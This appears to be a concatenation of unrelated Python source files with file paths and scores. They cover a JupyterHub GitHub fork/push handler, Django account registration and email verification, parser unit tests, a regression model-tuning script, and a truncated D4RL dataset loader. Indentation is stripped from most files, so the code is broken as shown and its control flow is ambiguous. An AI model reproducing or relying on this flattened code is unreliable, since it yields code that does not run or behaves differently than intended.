              iter_idx, idx, "swap", swap, filename) | mmdet/core/utils/debug_utils.py | 0.766206 | 0.506469 |
from tornado import web, gen
from docker.errors import NotFound
from jupyterhub.handlers.base import BaseHandler
from IPython.html.utils import url_path_join
from tornado.httputil import url_concat
from tornado.httpclient import HTTPRequest, AsyncHTTPClient
import json
import re
@gen.coroutine
def _fork_github_repo(url, token):
http_client = AsyncHTTPClient()
headers={"User-Agent": "JupyterHub",
"Authorization": "token {}".format(token)
}
result = re.findall('^https://github.com/([^/]+)/([^/]+).*', url)
if not result:
raise ValueError('URL is not a github URL')
owner, repo = result[0]
api_url = "https://api.github.com/repos/%s/%s/forks" % (owner, repo)
req = HTTPRequest(api_url,
method="POST",
headers=headers,
body='',
)
resp = yield http_client.fetch(req)
return json.loads(resp.body.decode('utf8', 'replace'))
@gen.coroutine
def _github_fork_exists(username, url, token):
http_client = AsyncHTTPClient()
headers={"User-Agent": "JupyterHub",
"Authorization": "token {}".format(token)
}
result = re.findall('^https://github.com/([^/]+)/([^/]+).*', url)
if not result:
raise ValueError('URL (%s) is not a github URL' % url)
owner, repo = result[0]
api_url = "https://api.github.com/repos/%s/%s" % (username, repo)
req = HTTPRequest(api_url,
method="GET",
headers=headers,
)
    try:
        yield http_client.fetch(req)
        return True
    except Exception:
        # the GitHub API returns 404 when the fork does not exist
        return False
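# True when the user's working tree inside the spawned container differs from
# HEAD (checked by running 'git diff --name-only' in the container).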
@gen.coroutine
def _repository_changed(user):
try:
setup = yield user.spawner.docker(
'exec_create',
container=user.spawner.container_id,
cmd="bash -c 'cd $JPY_WORKDIR && \
(git fetch --unshallow > /dev/null 2>&1; true) && \
git diff --name-only'",
)
out = yield user.spawner.docker(
'exec_start',
exec_id=setup['Id'],
)
except NotFound:
return False
if out:
return True
else:
return False
@gen.coroutine
def _push_github_repo(user, url, commit_sha, branch_name, token):
result = re.findall('^https://github.com/([^/]+)/([^/]+).*', url)
if not result:
raise ValueError('URL is not a github URL')
owner, repo = result[0]
fork_url = "https://{}@github.com/{}/{}".format(token, user.name, repo)
out = yield user.spawner.docker(
'exec_create',
container=user.spawner.container_id,
cmd="bash -c 'cd $JPY_WORKDIR && \
git config --global user.email \"<EMAIL>\" && \
git config --global user.name \"Everware\" && \
(git fetch --unshallow; true) && \
git add . && \
git commit -m \"Update through everware\" && \
(git remote add everware-fork {fork_url}; true) && \
git push -f everware-fork {branch_name}'".format(
fork_url=fork_url,
commit_sha=commit_sha,
branch_name=branch_name
),
)
response = yield user.spawner.docker(
'exec_start',
exec_id=out['Id'],
)
class HomeHandler(BaseHandler):
"""Render the user's home page."""
@web.authenticated
@gen.coroutine
def get(self):
user = self.get_current_user()
repourl = self.get_argument('repourl', '')
do_fork = self.get_argument('do_fork', False)
do_push = self.get_argument('do_push', False)
if repourl:
self.log.info('Got %s in home' % repourl)
self.redirect(url_concat(
url_path_join(self.hub.server.base_url, 'spawn'), {
'repourl': repourl
}
))
return
branch_name = commit_sha = None
repo_url = ''
fork_exists = False
repository_changed = False
if user.running and hasattr(user, 'login_service'):
branch_name = user.spawner.branch_name
commit_sha = user.spawner.commit_sha
if user.login_service == "github":
if do_fork:
self.log.info('Will fork %s' % user.spawner.repo_url)
yield _fork_github_repo(
user.spawner.repo_url,
user.token,
)
self.redirect('/hub/home')
return
if do_push:
self.log.info('Will push to fork')
yield _push_github_repo(
user,
user.spawner.repo_url,
commit_sha,
branch_name,
user.token,
)
self.redirect('/hub/home')
return
repo_url = user.spawner.repo_url
fork_exists = yield _github_fork_exists(
user.name,
user.spawner.repo_url,
user.token,
)
repository_changed = yield _repository_changed(user)
if hasattr(user, 'login_service'):
loginservice = user.login_service
else:
loginservice = 'none'
html = self.render_template('home.html',
user=user,
repourl=repo_url,
login_service=loginservice,
fork_exists=fork_exists,
repository_changed=repository_changed,
branch_name=branch_name,
commit_sha=commit_sha
)
        self.finish(html) | everware/home_handler.py | 0.355439 | 0.061876 |
from django.shortcuts import render, redirect
from django.views.generic import FormView, TemplateView
from django.urls import reverse, reverse_lazy
from django.db import transaction
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth import get_user_model, login
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.core import mail
from django.template.loader import render_to_string
from django.contrib import messages
from django.conf import settings
from user.models import UserProfile, Candidate
from . import forms
from user.forms import ResetPasswordEmailForm
User = get_user_model()
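# The verification mail carries an activation URL whose token comes from
# Django's PasswordResetTokenGenerator, reused here as a one-time
# email-verification token; both text and HTML bodies are rendered.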
def send_verification_email(user, url, request):
context = {
'user': user,
'activation_url': url,
}
message = render_to_string("emails/email-verification.txt", context=context, request=request)
html_message = render_to_string("emails/email-verification.html", context=context, request=request)
subject = 'Verify your account! - TalentAlps'
from_email = settings.DEFAULT_FROM_EMAIL
to = user.email
mail.send_mail(subject, message, from_email, [to], html_message=html_message)
# Create your views here.
class CandidateRegisterView(FormView):
template_name = 'registration/candidate-registration.html'
form_class = forms.UserProfileForm
success_url = reverse_lazy('login')
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['candidate_form'] = forms.CandidateRegisterForm()
return context
def form_valid(self, form):
candidate_form = forms.CandidateRegisterForm(self.request.POST)
if candidate_form.is_valid():
# Create User, UserProfile, Candidate models
try:
with transaction.atomic():
user = User.objects.create(
username=form.cleaned_data.get('username'),
email=form.cleaned_data.get('email'),
first_name=form.cleaned_data.get('name')
)
user.set_password(form.cleaned_data.get('password'))
user.save()
userprofile = UserProfile.objects.create(
name=form.cleaned_data.get('name'),
contact=form.cleaned_data.get('contact'),
state=form.cleaned_data.get('state'),
country=form.cleaned_data.get('country'),
user=user
)
candidate = candidate_form.save(commit=False)
candidate.state = form.cleaned_data.get('state')
candidate.nationality = form.cleaned_data.get('country')
candidate.userprofile = userprofile
candidate.save()
token_generator = PasswordResetTokenGenerator()
token = token_generator.make_token(user)
url = self.request.build_absolute_uri(reverse('registration:email-verify', args=(user.pk, token)))
send_verification_email(user, url, self.request)
messages.info(self.request, _(f"A verification email has been sent to - {user.email}, you must verify your account before you can log in."))
return super().form_valid(form)
            except Exception:
messages.error(self.request, _("Something went wrong, please try again."))
return super().get(self.request)
else:
return super().form_invalid(candidate_form)
class EmployerRegisterView(FormView):
template_name = 'registration/employer-registration.html'
form_class = forms.UserProfileForm
success_url = reverse_lazy('registration:employer-register-success')
def form_valid(self, form):
try:
with transaction.atomic():
user = User.objects.create(
username=form.cleaned_data.get('email'),
email=form.cleaned_data.get('email'),
first_name=form.cleaned_data.get('name'),
)
user.set_password(form.cleaned_data.get('password'))
user.save()
userprofile = user.userprofile
userprofile.is_employer = True
userprofile.receive_updates = form.cleaned_data.get('receive_updates')
userprofile.save()
token_generator = PasswordResetTokenGenerator()
token = token_generator.make_token(user)
url = self.request.build_absolute_uri(reverse('registration:email-verify', args=(user.pk, token)))
send_verification_email(user, url, self.request)
messages.info(self.request, _(f"A verification email has been sent to - {user.email}, you must verify your account before you can log in."))
return super().form_valid(form)
        except Exception:
messages.error(self.request, _("Something went wrong, please try again."))
return super().get(self.request)
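# Unlike CandidateRegisterView, the employer flow reads user.userprofile
# without creating it, which presumably relies on a post_save signal on the
# User model creating a blank UserProfile elsewhere in the project.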
class EmployerRegistrationSuccessView(TemplateView):
template_name = 'registration/employer-registration-success.html'
class EmployerResendVerificationEmailView(TemplateView):
template_name = 'registration/employer-resend-verification-email.html'
class UserEmailVerificationView(TemplateView):
template_name = 'registration/user-email-verification.html'
def get(self, request, *args, **kwargs):
self.user = User.objects.get(pk=self.kwargs.get('pk'))
token_generator = PasswordResetTokenGenerator()
url_token = self.kwargs.get('token')
self.valid = False
self.verified = False
if token_generator.check_token(self.user, url_token):
self.valid = True
if self.user.userprofile.verified:
self.verified = True
self.user.userprofile.verified = True
self.user.userprofile.save()
return super().get(request, *args, **kwargs)
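# TemplateView places the view instance in the template context as 'view',
# so the template can branch on {{ view.valid }} and {{ view.verified }}.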
class ResendVerificationEmail(FormView):
template_name = 'registration/resend-verification.html'
form_class = ResetPasswordEmailForm
success_url = reverse_lazy('login')
def form_valid(self, form):
messages.info(self.request, _(f"Verification email has been sent to - {form.cleaned_data.get('email')}, please check your inbox."))
try:
user = User.objects.get(email=form.cleaned_data.get('email'))
if not user.userprofile.verified:
token_generator = PasswordResetTokenGenerator()
token = token_generator.make_token(user)
url = self.request.build_absolute_uri(reverse('registration:email-verify', args=(user.pk, token)))
send_verification_email(user, url, self.request)
except User.DoesNotExist:
return super().form_valid(form)
        return super().form_valid(form) | registration/views.py | 0.419767 | 0.054904 |
from tests.infrastructure.test_utils import parse_local
from tests.parser.test_method_call_parsing import validate_method_call
from thinglang.lexer.values.identifier import Identifier
from thinglang.lexer.values.inline_text import InlineString
from thinglang.lexer.values.numeric import NumericValue
from thinglang.parser.statements.assignment_operation import AssignmentOperation
from thinglang.parser.values.binary_operation import BinaryOperation
from thinglang.parser.values.method_call import MethodCall
def validate_assignment(node, type, name, value):
assert isinstance(node, AssignmentOperation)
assert node.name == Identifier(name)
assert node.name.type == (Identifier(type) if type else None)
assert node.intent == (AssignmentOperation.DECELERATION if type else AssignmentOperation.REASSIGNMENT)
    if value in (MethodCall, BinaryOperation):
        assert isinstance(node.value, value)
    else:
        assert node.value == value
def test_immediate_declarations():
validate_assignment(parse_local('number a = 5'), 'number', 'a', NumericValue(5))
validate_assignment(parse_local('text a = "hello world!"'), 'text', 'a', InlineString('hello world!'))
def test_immediate_assignments():
validate_assignment(parse_local('a = 5'), None, 'a', NumericValue(5))
validate_assignment(parse_local('a = "hello world!"'), None, 'a', InlineString('hello world!'))
def test_simple_method_call_value_type():
assignment = parse_local('number a = number.random()')
validate_assignment(assignment, 'number', 'a', MethodCall)
validate_method_call(assignment.value, ['number', 'random'], [])
def test_complex_method_call_value_type():
assignment = parse_local('number a = distribution.normal(number.random(10), number.random(25))')
validate_assignment(assignment, 'number', 'a', MethodCall)
validate_method_call(assignment.value, ['distribution', 'normal'], [[NumericValue], [NumericValue]])
def test_arithmetic_operation_value_type():
assignment = parse_local('number a = 2 * (4 + 2) * (3 + 2)')
validate_assignment(assignment, 'number', 'a', BinaryOperation)
assert assignment.value.evaluate() == 60
def test_in_place_modifier():
reassignment = parse_local('a += 2 * 8')
validate_assignment(reassignment, None, 'a', BinaryOperation)
assert reassignment.value.lhs == Identifier('a')
assert isinstance(reassignment.value.rhs, BinaryOperation)
    assert reassignment.value.rhs.evaluate() == 16 | tests/parser/test_assignment_operation_parsing.py | 0.73029 | 0.622201 |
import pandas as pd
import numpy as np
from sklearn import svm
from sklearn import model_selection
from sklearn.model_selection import learning_curve
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import cross_val_predict
from sklearn.linear_model import ElasticNetCV
from sklearn.model_selection import KFold
from sklearn import linear_model
import xgboost as xgb
import matplotlib.pyplot as plt
from sklearn.preprocessing import RobustScaler
from sklearn.pipeline import make_pipeline
from sklearn.linear_model import LassoCV
from sklearn.linear_model import RidgeCV
from lightgbm import LGBMRegressor
import feature_list
def plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,
n_jobs=-1, train_sizes=np.linspace(.1, 1.0, 5), verbose=0):
plt.figure()
plt.title(title)
if ylim is not None:
plt.ylim(*ylim)
plt.xlabel("Training examples")
plt.ylabel("Score")
train_sizes, train_scores, test_scores = learning_curve(estimator, X, y, cv=cv,
n_jobs=n_jobs, train_sizes=train_sizes)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.grid()
plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1, color='r')
plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color='g')
plt.plot(train_sizes, train_scores_mean, 'o-', color="r", label="Training score")
plt.plot(train_sizes, test_scores_mean, 'o-', color="g", label="Cross-validation score")
plt.legend(loc="best")
return plt
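# The shaded bands are +/- one standard deviation across the CV folds; the
# figure is only rendered once the caller invokes plt.show().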
def select_drop_standard(traindata, testdata, num):
    # select features: dispatch to feature_list.select_feature{num} (one selector per car, 1..16)
    select_fn = getattr(feature_list, 'select_feature{}'.format(num))
    selected, select_list = select_fn(traindata, True)
    selected_testB_features, select_list_testB = select_fn(testdata, False)
selected.reset_index(drop=True, inplace=True)
selected_testB_features.reset_index(drop=True, inplace=True)
    # drop any rows containing NaNs
selected_nonan = selected.dropna(axis=0, how='any')
train_targets = pd.DataFrame(selected_nonan['charge_energy'], columns=['charge_energy'])
train_nonan_features = selected_nonan.drop(['charge_energy'], axis=1)
train_test_features = pd.concat([train_nonan_features, selected_testB_features], axis=0)
train_test_features.reset_index(drop=True, inplace=True)
    # note the scaling method: RobustScaler quantile_range=(25.0, 75.0) -- quantile-based standardization of the features
select_list.remove('charge_energy')
x_scaler = RobustScaler()
y_scaler = RobustScaler()
n_X_train_test = x_scaler.fit_transform(np.array(train_test_features))
# n_y_train = y_scaler.fit_transform(np.log1p(np.array(train_targets))) # ln(x+1)变换
n_y_train = y_scaler.fit_transform(np.array(train_targets))
n_X_train_test_pd = pd.DataFrame(n_X_train_test, columns=select_list)
n_X_train_test_mer = n_X_train_test_pd.copy()
    # sparse one-hot matrices for the time dimensions
# chargemode_dummies = pd.get_dummies(train_test_features['charge_mode'], prefix='mode', prefix_sep='_')
# hour_dummies = pd.get_dummies(train_test_features['hour'], prefix='hour', prefix_sep='_')
# week_dummies = pd.get_dummies(train_test_features['week'], prefix='week', prefix_sep='_')
# month_dummies = pd.get_dummies(train_test_features['month'], prefix='month', prefix_sep='_')
# if 'phase' in select_list:
# phase_dummies = pd.get_dummies(train_test_features['phase'], prefix='phase', prefix_sep='_')
# n_X_train_test_mer = pd.concat([n_X_train_test_pd, chargemode_dummies, hour_dummies, week_dummies, month_dummies,phase_dummies], axis=1)
# n_X_train_test_mer.drop(['charge_mode', 'hour', 'week', 'month', 'phase'], axis=1, inplace=True)
# else:
# n_X_train_test_mer = pd.concat([n_X_train_test_pd, chargemode_dummies, hour_dummies, week_dummies, month_dummies], axis=1)
# n_X_train_test_mer.drop(['charge_mode', 'hour', 'week', 'month'], axis=1, inplace=True)
n_testB = n_X_train_test_mer.tail(selected_testB_features.shape[0])
n_X_train = n_X_train_test_mer.drop(n_testB.index.tolist())
return n_X_train, n_y_train, n_testB, y_scaler
ram_num = 5
kfolds = KFold(n_splits=10, shuffle=True, random_state=ram_num)
def cv_rmse(model, train, y_train):
rmse = np.sqrt(-cross_val_score(model, train, y_train, scoring="neg_mean_squared_error", cv = kfolds))
return(rmse)
def ridge_selector(k, X, y):
model = make_pipeline(RidgeCV(alphas = [k], cv=kfolds)).fit(X, y)
rmse = cv_rmse(model, X, y).mean()
return(rmse)
def lasso_selector(k, X, y):
model = make_pipeline(LassoCV(max_iter=1e7, alphas = [k],
cv = kfolds)).fit(X, y)
rmse = cv_rmse(model, X, y).mean()
return(rmse)
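# The two selectors above differ only in the CV estimator; a minimal generic
# sketch (not used below) could take the estimator class as a parameter:
# def cv_selector(estimator_cls, k, X, y, **kwargs):
#     model = make_pipeline(estimator_cls(alphas=[k], cv=kfolds, **kwargs)).fit(X, y)
#     return cv_rmse(model, X, y).mean()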
if __name__ == '__main__':
    # read each of the 16 cars' data separately: features + target
readFile_carfeatures = []
readFile_testfeatures = []
car_train_list = []
car_test_list = []
filenum = 17
for i in range(1,filenum):
readFile_carfeatures.append('../dataset/feature/train_feature/car' + str(i) + '_features.csv')
for i in range(1,filenum):
readFile_testfeatures.append('../dataset/feature/test_feature/car' + str(i) + 'testB_features.csv')
# train features + target
for i in range(len(readFile_carfeatures)):
car_train = pd.read_csv(readFile_carfeatures[i], dtype={'charge_start_time': str, 'charge_end_time': str})
car_train_list.append(car_train)
# test features
    for i in range(len(readFile_testfeatures)):
car_test = pd.read_csv(readFile_testfeatures[i])
car_test_list.append(car_test)
car_index = 0 # 0 = car1
    car_train = pd.read_csv(readFile_carfeatures[car_index], dtype={'charge_start_time': str, 'charge_end_time': str})
    car_test = car_test_list[car_index]  # use the matching car's test features, not the loop's leftover variable
    # optionally restrict to fast/slow charging mode
    # car_train = car_train[car_train['charge_mode'].isin([0])]
    # optionally restrict to a battery phase
    # car_train = car_train[car_train['phase'].isin([0])]
    norm_X_train, norm_y_train, norm_test, y_scal = select_drop_standard(car_train, car_test, num=car_index+1)
train_target = np.ravel(np.array(norm_y_train))
# plot_learning_curve
r_alphas_best = {'alpha': 0.0008}
title = "Learning Curves Ridge"
plot_learning_curve(linear_model.Ridge(**r_alphas_best), title, norm_X_train, train_target, cv=5)
l_alphas_best = {'alpha': 0.00001}
title = "Learning Curves Lasso"
plot_learning_curve(linear_model.Lasso(**l_alphas_best), title, norm_X_train, train_target, cv=5)
    ElasticNet_param = {'alpha': 0.0001, 'l1_ratio': 5}  # note: scikit-learn documents l1_ratio in [0, 1]
    title = "Learning Curves ElasticNet"
    plot_learning_curve(linear_model.ElasticNet(**ElasticNet_param), title, norm_X_train, train_target, cv=5)
gbm_param = {'n_estimators': 2000, 'max_depth': 4, 'min_samples_split': 2, 'min_samples_leaf': 2,
'max_features': 'auto', 'subsample': 0.6, 'learning_rate': 0.008}
title = "Learning Curves gbm"
plot_learning_curve(GradientBoostingRegressor(**gbm_param), title, norm_X_train, train_target, cv=5)
xgb_param = {'max_depth': 3, 'min_child_weight': 0.9, 'gamma': 0.0001, 'subsample': 0.55,
'scale_pos_weight': 1, 'learning_rate': 0.008, 'reg_alpha': 0.001,
'colsample_bytree': 0.9, 'booster': 'gbtree', 'n_estimators': 3000}
title = "Learning Curves xgb"
plot_learning_curve(xgb.XGBRegressor(**xgb_param), title, norm_X_train, train_target, cv=5)
    svr_param = {'C': 250, 'gamma': 0.001}
    title = "Learning Curves SVR"
    plot_learning_curve(svm.SVR(**svr_param), title, norm_X_train, train_target, cv=5)
    #### Ridge: pick the best alpha
    r_alphas = [0,0.00001,0.0001,0.0008,0.001,0.005,0.1,0.4,1,10,15,20,30,40,50]
    r_alphas = [0,0.00001,0.0001,0.0008,0.001,0.005,0.1,0.4,1]  # narrowed grid; overrides the full grid above
ridge_scores = []
for alpha in r_alphas:
score = ridge_selector(alpha, norm_X_train, train_target)
ridge_scores.append(score)
ridge_score_table = pd.DataFrame(ridge_scores, r_alphas, columns=['Ridge_RMSE'])
print(ridge_score_table)
    # evaluate with the best parameter
r_alphas_best = [0.0008]
ridge = make_pipeline(RidgeCV(alphas = r_alphas_best, cv = kfolds))
ridge_model_score = cv_rmse(ridge, norm_X_train, train_target)
plt.plot(r_alphas, ridge_scores, label='Ridge')
    plt.legend(loc='center')
plt.xlabel('alpha')
plt.ylabel('score')
print("ridge cv score: {0:.6f}".format(ridge_model_score.mean()))
    #### Lasso: pick the best alpha
l_alphas = [0.00001,0.0001,0.001,0.003,0.008,0.01,0.05,0.1,0.2]
lasso_scores = []
for alpha in l_alphas:
score = lasso_selector(alpha, norm_X_train, train_target)
lasso_scores.append(score)
lasso_score_table = pd.DataFrame(lasso_scores, l_alphas, columns=['Lasso_RMSE'])
print(lasso_score_table)
    # evaluate with the best parameter
l_alphas_best = [0.001]
lasso = make_pipeline(LassoCV(max_iter=1e7, alphas = l_alphas_best, cv = kfolds))
lasso_model_score = cv_rmse(lasso, norm_X_train, train_target)
print("Lasso cv score: {0:.6f}".format(lasso_model_score.mean()))
lasso_model2 = make_pipeline(RobustScaler(),
LassoCV(max_iter=1e7,
alphas = l_alphas,
random_state = 42)).fit(norm_X_train, train_target)
scores = lasso_model2.steps[1][1].mse_path_
plt.figure()
plt.xlabel('alpha')
plt.ylabel('RMSE')
plt.tight_layout()
plt.show()
    #### inspect the features that drive lasso k-fold overfitting
alphas_mse = [0.00001,0.0001,0.006,0.001,0.003,0.008,0.01,0.05,0.1,0.2,0.3,0.4,0.5]
lasso_model_mse = make_pipeline(RobustScaler(), LassoCV(max_iter=1e7, alphas = alphas_mse, cv = kfolds
)).fit(norm_X_train, train_target)
lasso_model_score = cv_rmse(lasso_model_mse, norm_X_train, train_target)
print("Lasso cv score: {0:.6f}".format(lasso_model_score.mean()))
lcv_scores = lasso_model_mse.steps[1][1].mse_path_
    plt.plot(lasso_model_mse.steps[1][1].alphas_, lcv_scores, label='Lasso')  # mse_path_ rows follow the fitted alphas_ ordering, not the user-supplied list
coeffs = pd.DataFrame(list(zip(norm_X_train.columns, lasso_model_mse.steps[1][1].coef_)), columns=['Features', 'Coefficients'])
used_coeffs = coeffs[coeffs['Coefficients'] != 0].sort_values(by='Coefficients', ascending=False)
print(used_coeffs.shape)
print(used_coeffs)
used_coeffs_values = norm_X_train[used_coeffs['Features']]
used_coeffs_values.shape
overfit_test2 = []
for i in used_coeffs_values.columns:
counts2 = used_coeffs_values[i].value_counts()
zeros2 = counts2.iloc[0]
if zeros2 / len(used_coeffs_values) * 100 > 40:
overfit_test2.append(i)
print('Overfit Features')
print(overfit_test2)
#### elastic_model
e_alphas_best = [0.0008,0.0001,0.0002,0.001,0.01,0.1,1,10,100]
e_l1ratio_best = [0.001,0.01,0.1,1,5,10,100]
elastic = make_pipeline(RobustScaler(),
ElasticNetCV(max_iter=1e5, alphas=e_alphas_best,
cv=kfolds, l1_ratio=e_l1ratio_best))
elastic_model = elastic.fit(norm_X_train, train_target)
elastic_model_score = cv_rmse(elastic_model, norm_X_train, train_target)
print("elastic cv score: {0:.6f}".format(elastic_model_score.mean()))
print(elastic_model.steps[1][1].alpha_)
print(elastic_model.steps[1][1].l1_ratio_)
    #### XGBoost: pick the best parameters
xgb_reg = xgb.XGBRegressor()
xgb_reg_param_grid = {'max_depth': [3,4,6], 'min_child_weight': [0.9,1], 'gamma': [0.0001],'colsample_bytree': [0.9,0.8],
'subsample': [0.7,0.55], 'scale_pos_weight': [1], 'learning_rate': [0.01], 'reg_alpha': [0.001],
'booster': ['gbtree'], 'n_estimators': [3000]}
xgb_reg_param_grid = {'max_depth': [4], 'min_child_weight': [1], 'gamma': [0.0001],'colsample_bytree': [0.9],
'subsample': [0.55], 'scale_pos_weight': [1], 'learning_rate': [0.01], 'reg_alpha': [0.001],
'booster': ['gbtree'], 'n_estimators': [3000]}
xgb_reg_grid = model_selection.GridSearchCV(xgb_reg, xgb_reg_param_grid, cv=10, verbose=1, n_jobs=-1,
scoring='neg_mean_squared_error')
xgb_reg_grid.fit(norm_X_train, train_target)
print('Best XGB Params:' + str(xgb_reg_grid.best_params_))
print('Best XGB score:' + str(np.sqrt(-xgb_reg_grid.best_score_)))
feature_imp_sorted_xgb = pd.DataFrame({'feature': list(norm_X_train),
'importance': xgb_reg_grid.best_estimator_.feature_importances_}).sort_values(
'importance', ascending=False)
features_top_n_xgb = feature_imp_sorted_xgb.head(10)['feature']
xgb_feature_importance = 100.0 * (feature_imp_sorted_xgb['importance'] / feature_imp_sorted_xgb['importance'].max())
xgb_important_idx = np.where(xgb_feature_importance)[0]
posxgb = np.arange(xgb_important_idx.shape[0]) + .5
plt.barh(posxgb, np.array(xgb_feature_importance[xgb_feature_importance != 0]))
plt.yticks(posxgb, feature_imp_sorted_xgb['feature'])
plt.xlabel('Relative Importance')
plt.title('XGB Features Importance')
plt.show()
    #### GBM: pick the best parameters
gbm_reg = GradientBoostingRegressor(random_state=1)
gbm_reg_param_grid = {'n_estimators': [2000,3000], 'max_depth': [3,4], 'min_samples_split': [2,10,15], 'min_samples_leaf': [2,5],
'max_features': ['auto'], 'subsample': [0.6,0.7], 'learning_rate': [0.01]}
gbm_reg_param_grid = {'n_estimators': [2000], 'max_depth': [4], 'min_samples_split': [2], 'min_samples_leaf': [2],
'max_features': ['auto'], 'subsample': [0.6], 'learning_rate': [0.01]}
gbm_reg_grid = model_selection.GridSearchCV(gbm_reg, gbm_reg_param_grid, cv=10, verbose=1, n_jobs=-1,
scoring='neg_mean_squared_error')
gbm_reg_grid.fit(norm_X_train, train_target)
print('Best gbm Params:' + str(gbm_reg_grid.best_params_))
print('Best gbm score:' + str(np.sqrt(-gbm_reg_grid.best_score_)))
feature_imp_sorted_gbm = pd.DataFrame({'feature': list(norm_X_train),
'importance': gbm_reg_grid.best_estimator_.feature_importances_}).sort_values(
'importance', ascending=False)
features_top_n_gbm = feature_imp_sorted_gbm.head(10)['feature']
gbm_feature_importance = 100.0 * (feature_imp_sorted_gbm['importance'] / feature_imp_sorted_gbm['importance'].max())
gbm_important_idx = np.where(gbm_feature_importance)[0]
posgbm = np.arange(gbm_important_idx.shape[0]) + .5
plt.figure()
plt.barh(posgbm, np.array(gbm_feature_importance[gbm_feature_importance != 0]))
plt.yticks(posgbm, feature_imp_sorted_gbm['feature'])
plt.xlabel('Relative Importance')
plt.title('GradientBoosting Feature Importance')
    #### LightGBM: pick the best parameters
# lgm_reg = LGBMRegressor()
# lgm_reg_param_grid = {'learning_rate':[0.01], 'n_estimators':[2000],
# 'max_depth':[3], 'num_leaves':[4],
# 'max_bin':[55],
# 'feature_fraction': [0.8],'bagging_fraction':[0.9],
# 'min_data_in_leaf':[6],'min_sum_hessian_in_leaf':[0.7]}
# lgm_reg_grid = model_selection.GridSearchCV(lgm_reg, lgm_reg_param_grid, cv=10, verbose=1, n_jobs=-1,
# scoring='neg_mean_squared_error')
# lgm_reg_grid.fit(norm_X_train, train_target)
# print('Best lgm Params:' + str(lgm_reg_grid.best_params_))
# print('Best lgm score:' + str(np.sqrt(-lgm_reg_grid.best_score_)))
# feature_imp_sorted_lgm = pd.DataFrame({'feature': list(norm_X_train),
# 'importance': lgm_reg_grid.best_estimator_.feature_importances_}).sort_values(
# 'importance', ascending=False)
# features_top_n_lgm = feature_imp_sorted_lgm.head(10)['feature']
# lgm_feature_importance = 100.0 * (feature_imp_sorted_lgm['importance'] / feature_imp_sorted_lgm['importance'].max())
# lgm_important_idx = np.where(lgm_feature_importance)[0]
# poslgm = np.arange(lgm_important_idx.shape[0]) + .5
# plt.barh(poslgm, np.array(lgm_feature_importance[lgm_feature_importance != 0]))
# plt.yticks(poslgm, feature_imp_sorted_lgm['feature'])
# plt.xlabel('Relative Importance')
# plt.title('Lgbm Feature Importance')
#### svr model
svr_reg = svm.SVR()
svr_reg_param_grid = {'C':[0.1,1,10,20,40,60,70,100,200,250,300,350,400,500,1000,2000,3000,4000],
'gamma':[0.00001,0.0001,0.0003,0.0005,0.001,0.005,0.01,0.1,1,10,100,1000]}
svr_reg_grid = model_selection.GridSearchCV(svr_reg, svr_reg_param_grid, cv=10, verbose=1, n_jobs=-1,
scoring='neg_mean_squared_error')
svr_reg_grid.fit(norm_X_train, train_target)
print('Best svr Params:' + str(svr_reg_grid.best_params_))
    print('Best svr score:' + str(np.sqrt(-svr_reg_grid.best_score_))) | models/tunning.py | 0.463201 | 0.479138 |
import collections
from typing import Tuple
import d4rl  # noqa: F401 -- imported for its side effect of registering D4RL environments with gym
import gym
import numpy as np
from rjax.datasets.d4rl.utils import (get_preprocessing_fn,
sequence_dataset_iter)
from rjax.datasets.dataset import Dataset
Batch = collections.namedtuple(
'Batch',
[
'observations', # [ batch_size x (seq_len + 1) x obs_dim ]
'actions', # [ batch_size x seq_len x act_dim ]
'rewards', # [ batch_size x seq_len ]
'terminals', # [ batch_size x seq_len ]
'pad_masks', # [ batch_size x (seq_len + 1) ]
])
class D4RLSequenceDataset(Dataset):
def __init__(
self,
env_name: str,
env: gym.Env,
seq_len: int = 15,
front_pad: int = 0,
back_pad: int = 0,
):
self.env = env
self.seq_len = seq_len
self.front_pad = front_pad
self.back_pad = back_pad
dataset = self.env.get_dataset()
dataset = get_preprocessing_fn(env_name)(dataset)
dataset_iter = sequence_dataset_iter(self.env, dataset)
self.path_lengths = []
self.observations_segmented = []
self.actions_segmented = []
self.rewards_segmented = []
self.terminals_segmented = []
self.pad_masks_segmented = []
for data in dataset_iter:
assert data["steps"] == data["rewards"].shape[0]
assert data["steps"] + 1 == data["observations"].shape[0]
self.path_lengths.append(data["steps"])
self.observations_segmented.append(data["observations"].astype(
np.float32))
self.actions_segmented.append(data["actions"].astype(np.float32))
self.rewards_segmented.append(data["rewards"].astype(np.float32))
self.terminals_segmented.append(data["terminals"].astype(
np.float32))
self.pad_masks_segmented.append(
np.ones(data["observations"].shape[0], dtype=np.float32))
self.n_trajectories = len(self.path_lengths)
# padding
for i in range(self.n_trajectories):
self.path_lengths[
i] = self.front_pad + self.path_lengths[i] + self.back_pad
self.observations_segmented[i] = np.pad(
self.observations_segmented[i],
((self.front_pad, self.back_pad), (0, 0)),
constant_values=0.0)
self.actions_segmented[i] = np.pad(
self.actions_segmented[i],
((self.front_pad, self.back_pad), (0, 0)),
constant_values=0.0)
self.rewards_segmented[i] = np.pad(
self.rewards_segmented[i], ((self.front_pad, self.back_pad), ),
constant_values=0.0)
self.terminals_segmented[i] = np.pad(
self.terminals_segmented[i],
((self.front_pad, self.back_pad), ),
constant_values=0.0)
self.pad_masks_segmented[i] = np.pad(
self.pad_masks_segmented[i],
((self.front_pad, self.back_pad), ),
constant_values=0.0)
# generate dataset indices
indices = []
for path_ind, length in enumerate(self.path_lengths):
end = length - self.seq_len + 1
for i in range(end):
indices.append((path_ind, i, i + self.seq_len))
self.indices = np.array(indices)
self._size = len(self.indices)
@property
def size(self) -> int:
return self._size
def __getitem__(
self, idx: int
) -> Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray]:
path_ind, start_ind, end_ind = self.indices[idx]
# [ (seq_len + 1) x obs_dim ]
observations = self.observations_segmented[path_ind][
start_ind:end_ind + 1]
# [ seq_len x act_dim ]
actions = self.actions_segmented[path_ind][start_ind:end_ind]
